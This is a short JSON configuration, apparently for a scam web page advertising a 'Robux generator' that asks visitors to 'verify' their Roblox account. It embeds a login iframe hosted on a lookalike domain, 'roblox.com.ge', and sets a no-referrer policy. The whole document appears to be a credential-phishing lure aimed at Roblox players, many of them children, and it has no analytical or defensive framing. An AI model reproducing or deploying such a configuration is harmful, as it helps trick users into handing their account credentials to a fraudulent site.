{
  "title": "The Best Robux Generator, Verify Your Roblox Account To Get Robux",
  "iframeUrl": "https://roblox.com.ge/login?returnUrl=6537766312189903",
  "buttonText": "Verify",
  "noReferralPolicy": true
}
